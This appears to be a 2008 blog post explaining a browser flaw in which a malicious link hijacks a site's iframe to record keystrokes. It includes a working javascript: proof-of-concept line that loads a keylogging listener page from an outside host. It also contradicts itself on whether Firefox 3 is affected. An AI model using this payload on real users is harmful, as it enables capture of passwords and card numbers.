Browser vulnerabilities are nothing new, and they are constantly popping up no matter what software you’re using. Today, however, there’s an especially eerie one that Ghacks found which currently affects almost all versions of Internet Explorer 6, 7, and 8. It’s capable of recording all of your keystrokes even after you’ve left the site that you were visiting.




Update (6/27/2008 @ 1:34PM CST): As some commenters have pointed out this vulnerability does affect Firefox 3 users as well.

How does it work? First the user must click on a malicious link that uses JavaScript to open a URL in a new window/tab. The site that you were expecting to open will be displayed without any issues, and you’ll likely assume that you’ve completely left the referring site. Once the JavaScript code finishes executing it will hijack the first iframe that it finds on the website, and it will begin capturing any of your keystrokes.

Want some proof? This site has an example link to demonstrate how it works. To show just how versatile this is I modified a small portion of the code so that it opens our homepage, and takes over the first iframe that appears at the very top. Here’s what the code looks like, and click on it to see what I’m talking about:

javascript:x=open(‘http://cybernetnews.com/’);setInterval(function(){try{x.frames[0].location={toString:function(){return%20’http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);

If you are using a susceptible browser you should have noticed that the iframe at the top of the page turned solid red, and anytime you pressed a key on the keyboard it displayed in the box:

ie javascript vulnerability-1.png

I didn’t modify our site’s code in any way to get this to work, and any site you visit that uses iframes are susceptible to being a host for the vulnerability. That means it could easily steal login credentials or credit card information assuming an iframe is available on the page. Scary, huh?

As of right now a proof-of-concept is only available for Internet Explorer, but with a little more work it’s possible that it could also affect other browsers. I have verified that the current method works in Internet Explorer 6, and it doesn’t work in Firefox 3, Opera 9.5, and Safari 3. Here’s more information on how the vulnerability operates.